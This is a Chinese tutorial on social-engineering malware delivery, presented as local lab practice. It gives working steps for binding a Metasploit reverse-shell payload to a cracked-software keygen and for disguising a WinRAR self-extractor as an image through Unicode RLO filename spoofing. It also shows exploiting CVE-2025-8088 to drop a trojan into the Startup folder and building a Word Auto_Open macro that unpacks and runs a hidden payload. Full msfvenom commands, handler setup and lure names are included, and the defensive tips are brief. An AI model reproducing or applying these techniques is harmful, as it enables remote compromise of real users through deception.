实验操作均在本地靶机内操作,据网络安全法,作者不对因阅读、理解、误用或滥用本文内容而导致的任何直接、间接、附带或后果性损害承担责任。
1、破解程序注册机捆绑木马
大家经常会在网上找一些需要付费的程序的破解版,这种程序一般都带一个注册机,而且注册机一般可能会报毒,这时候说明文档里还可能会建议把杀毒软件关了,那么把木马绑在注册机上就成功率比较高了。
1.1 binding准备
我们要使用binding进行捆绑,先装好golang,设置好go代理:
apt update
apt -y install golang
go env -w GOPROXY=https://goproxy.cn,direct
然后上传binding,并且添加可执行权限
chmod +x binding
1.2 资源准备
找到一个带注册机的破解软件,这里以 SecureCRT 为例,使用 Restorator 把注册机的图标扒下来:

把注册机和 ico 图标都传到kali机上:

1.3 使用 msfvenom 生成 msf 后门程序
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.124.66 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
- -a 指定架构如 x86 x64。 x86 代表 32 位, x64 代表 64 位。 32 位软件可以在 64 位系统上运行。所以我们生成 32 位的后门,这样在 32 位和 64 位系统中都可以使用。
- --platform 指定平台,这里选择 windows,通过 --l platforms 可以查看所有支持的平台。
- -p 设置攻击载荷,我们使用 windows/meterpreter/reverse_tcp,可以通过-l payloads 查看所有攻击载荷。
- LHOST 目标主机执行程序后连接我们 Kali 的地址。
- LPORT 目标主机执行程序后连接我们 Kali 的端口。
- -b 去掉坏字符,坏字符会影响 payload 正常执行。\x00 代表 16 进制的“00”组成的字符串。通过 ASCII 码换成能识别的就是:"00" -"00000000" - NUL。由于"00000000"是不可见字符,所以代码中没用。
- -e 指定编码器,也就是所谓的免杀,x86/shikata_ga_nai 是 msf 自带的编码器。
- -i 指定 payload 有效载荷编码迭代次数。 指定编码加密次数,为了让杀毒软件,更难查出源代码。
- -f 指定生成格式,可以是 raw,exe,elf,jar,c 语言的,python 的,java 的……,用 -l formats 查看所有支持的格式。
- -o 指定文件名称和导出位置。

1.4 注册机捆绑 msf 后门

-p 释放路径指的是绑定好的文件被运行后木马释放的路径,我们放在一个Windows都有而且不易暴露的位置,比如
c:\\windows\\temp\\。
./binding -m msf.exe -s keygen.exe -i 129.ico -p c:\\windows\\temp\\

如果有用 mac arm 的 bingding 用 binding-linux-arm64,另外 msf 生成 exe 的时候不要指定架构。
下载到本地,注意关闭杀软:
sz output/payload.exe
或者用xftp:

把 payload.exe 改名为 keygen.exe 压缩打包好,传到靶机上。
1.5 目标机运行捆绑恶意程序的注册机并上线 MSF
MSF 配置侦听:
msfdb run
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.124.66
set lport 4444
run
在靶机运行keygen.exe:


避免中招的方法就是尽量不使用破解软件,或者不用来路不明或过不了杀毒的注册机。
2、WinRAR 捆绑木马伪装图片并自动上线 MSF
如今网络上会有各种分享各种图片包的,可以凭借人们的好奇心和欲望来伪装图片绑定木马,一旦图片被打开用户就会中毒,但是一般人们看图片杀毒软件都会开着,木马可以做些免杀操作,这里只讲述社工方面的技巧。
2.1 图片与木马通过WinRAR绑定
准备一张图片和生成好的木马(实际操作可以选择对应目标感兴趣的图片)

图片名仿md5编码,使用:
0c0f3f16880511ebb6edd017c2d2cexe.jpg
注意...exe.jpg这种格式,和后面的伪装有关。
去生成ico图标的网站生成图片的图标:http://www.ico51.cn/

选中图片和木马使用WinRAR添加到压缩文件:

然后到高级选项卡的自解压选项设置:

解压路径设置
C:\Windows\Temp:
解压后运行设置为:
C:\Windows\Temp\msf.exe
C:\Windows\Temp\0c0f3f16880511ebb6edd017c2d2cexe.jpg

静默模式解压:

更新方式的设置:
多次解压可能会出现文件已经存在的情况,如果文件存在会询问用户。
建议选择覆盖所有文件或跳过已存在的文件。
覆盖:缺点是如果 exe 程序已经运行那么覆盖会失败。
跳过:如果 exe 文件的参数有修改跳过后则运行的还是旧版本。
建议:每次制作不要用相同的名字。

添加刚刚生成的图标:

生成的自解压文件:

2.2 使用 Unicode 字符修改文件名进行伪装
先重命名自解压文件,重命名时右击选择Unicode字符的RLO模式,那么字符就是从右往左读,那么输入jpg的反文gpj。


然后复制好
0c0f3f16880511ebb6edd017c2d2cexe.jpg除最后面exe.jpg的部分,再重命名,重命名时按如下操作:
然后右击选择Unicode字符的LRO模式,再粘贴复制的
0c0f3f16880511ebb6edd017c2d2c:

可以说一般看不出区别了,比较看的话伪装图片预览要大一些。
这个一般在本机设置好了,传到其他机器又会恢复原状,伪装就失败了,可以通过压缩文件的方式,别人收到压缩文件,解压后还会是原状,同样进一步还可以给压缩文件起一个吸引人的名字,比如 漂亮妹妹:

2.3 靶机访问图片自动获取shell
kali启动监听(或者制造其他木马对应的监听)。
靶机下载了压缩包,解压查看伪装图片,木马就能上线了。

注意到在其他机器打开的图片
jpg前面少了exe.,那我们可以第二步LRO命名输入0c0f3f16880511ebb6edd017c2d2cexe.,既然不显示exe,我们还可以把exe换成别的字符,图片的也同时换,隐秘性更好,这里就不麻烦去都换了,有这个思路就行。同时我们还可以把其他图片和伪装图片掺杂在一起,一般图片选择预览图就容易看清楚的,而藏有木马的图片选择预览图复杂看不太清楚的,提高双击打开的概率。


此时双击“查看图片”(这就是前面图片名设置好了不会穿帮):

kali后台已有机器上线:

避免中招就要少下载奇怪或有诱惑力的图片,查看图片时注意识别图片真正的格式和属性。在压缩包里面看详细信息就能识别:

3、WinRAR 路径遍历漏洞捆绑木马上线 MSF
路径遍历漏洞就是在路径中添加\..\..\这样的返回上层级文件目录的符号,系统没有进行过滤从而导致文件读写或者获取权限的漏洞,WinRAR 路径遍历漏洞能捆绑木马,只要压缩包指定文件被打开或者压缩包解压就会中招,隐秘性强,但是有条件,就是存在于 WinRAR 7.12 及以下版本,如 winrar-x64-700scp.exe 安装版本,漏洞 CVE-2025-8088 号。
3.1 环境准备
在电脑安装好 python-3.13.7-amd64.exe。
准备好 CVE-2025-8088-Winrar-Tool-main 利用工具。
在相关路径CVE-2025-8088-Winrar-Tool-main下打开 cmd 安装依赖:

pip install -r requirements.txt -i https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple
pip install setuptools -i https://mirrors.tuna.tsinghua.edu.cn/pypi/web/simple

3.2 绑定木马到压缩包
在相同命令行界面启动漏洞利用工具创建 WinRAR 压缩包文件:
python gui.py

- Payload File:选择要执行的木马程序
- Decoy File:选择要伪装的文件(这里可以是真实的任何格式的文件)
- Fallback UserName:administrator
- Output Archive Name:文件输出名
伪装文件可以起一些有吸引力的名字诱惑点击。

之后打开压缩包中的伪装文件默认会释放木马文件到下面指定的启动项目录中。
%AppData%\Microsoft\Windows\Start Menu\Programs\Startup
3.3 目标机中招后重启受控
目标机下载了压缩包,解压或者点击查看感兴趣的内容:

此时看看目标机的启动项目录:

已经有了木马了,此时kali一直启用监听,等到目标机重启之后就上线了:


避免中招就不要下载来路不明的压缩包查看,如果要查看做好隔离到沙盒里查看。
4、Office 宏感染 word 文档获取 shell
只适用于 Office 的文档宏感染,不适用于 WPS。
4.1 msfvenom生成宏代码与payload
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.124.66 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

运行可能会有这个错误,复制给 openclaw 解决一下:

然后再运行得到一大串输出:


这一段代码是 MACRO CODE 宏代码。


第二段代码是 payload。
4.2 word文档组装宏感染木马
打开 Word 新建空白文档,起个有吸引力或好玩的名字,如 富婆通讯录,新建宏,创建宏名Auto_Open(来自于代码内函数名),选择宏位置:所有的活动模板和文档,点击创建,将上面的MACRO CODE 宏代码复制粘贴到编辑器保存,然后返回word文本编辑。


然后把 payload 完整复制粘贴到word文档中:

为了实现好的伪装效果,可以修改字体颜色为白色,字体大小行间距都最小,前面加上正文内容:


4.3 宏感染代码简单解析
4.3.1 自动执行函数
Auto_Open 是 Word 宏的一个特殊函数名。当文档被打开时,Word 会自动查找并执行这个函数。
Sub Auto_Open()
Zxdgw12
End Sub
4.3.2 Zxdgw12 子程序
这是病毒的主体,它主要做了三件事:寻找数据、提取数据、执行文件。
比较关键的部分如下:
Zxdgw3 = FreeFile()
Open Zxdgw1 For Binary As Zxdgw3 ' Zxdgw1 = "DDrzKBKrcEFdPPS.exe"
创建一个名为 DDrzKBKrcEFdPPS.exe 的新文件(文件名是随机生成的,用于躲避杀毒软件查杀)。
Jnmuhrsftw = "Jnmuhrsftw"
...
If (InStr(1,Zxdgw11,Jnmuhrsftw) > 0 And Len(Zxdgw11) > 0) Then
Zxdgw9 = True
End If
病毒并不是直接把载荷文件放在脚本里,而是藏在文档的最后。
病毒在文档区域定义了一串字符 Jnmuhrsftw 作为“起始标记”。代码会扫描文档的每一行文字。当它发现某一行包含 Jnmuhrsftw 时,它会将一个开关变量 Zxdgw9 设置为 True。一旦开关打开,代码进入写入模式:
While (Zxdgw8 < Len(Zxdgw11))
Zxdgw6 = Mid(Zxdgw11,Zxdgw8,4)
Put #Zxdgw3, , Zxdgw6
Zxdgw8 = Zxdgw8 + 4
Wend
写入的这串文本是恶意可执行文件(Payload)的十六进制(Hex)编码。病毒在运行时将这些编码还原成了二进制文件。
数据提取完成后,病毒调用 Zxdgw13 函数来运行它:
Sub Zxdgw13(Zxdgw10 As String)
Zxdgw7 = Shell(Zxdgw10, vbHide)
End Sub
4.3.3 简单归纳
| 步骤 | 阶段 | 关键动作 | 技术原理 |
|---|---|---|---|
| 1 | 诱导 | 用户打开文档,看到“启用宏以查看内容”的提示。 | 利用 Office 宏的自动执行特性。 |
| 2 | 定位 | 代码扫描文档文本,寻找 Jnmuhrsftw。 |
隐写术:将恶意代码作为普通文本隐藏在文档末尾。 |
| 3 | 释放 | 将找到的 Hex 数据解码并写入磁盘,生成 .exe。 |
二进制操作:在受害机器上重建恶意可执行文件。 |
| 4 | 执行 | 调用 Shell 命令运行生成的 .exe。 |
进程创建:加载真正的恶意载荷(木马/后门)。 |
| 5 | 潜伏 |
.exe 在后台运行(vbHide 隐藏窗口)。 |
持久化:通常该程序会连接黑客服务器或窃取数据。 |
4.4 目标机打开word并上线
kali开启监听后,目标机打开word文档,


你以为是别人做文档搞笑玩抽象,其实已经中招了。
文档一旦打开就会执行 payload 连接到 msf,关闭 word 文档之后 session 不受影响,其实受控机运行的是如下的木马:

避免中招就禁用宏,或者沙箱里看文件,不随意下载文件查看,好奇害死猫。
结语
以上是一些可能的社工渗透手段,目的不是让大家去做违法的事情,而是在对这些渗透的原理更加了解的情况下,谨防上当受骗,保持一份对网络世界的敬畏之心,网络不是非法之地,网络安全从你我做起。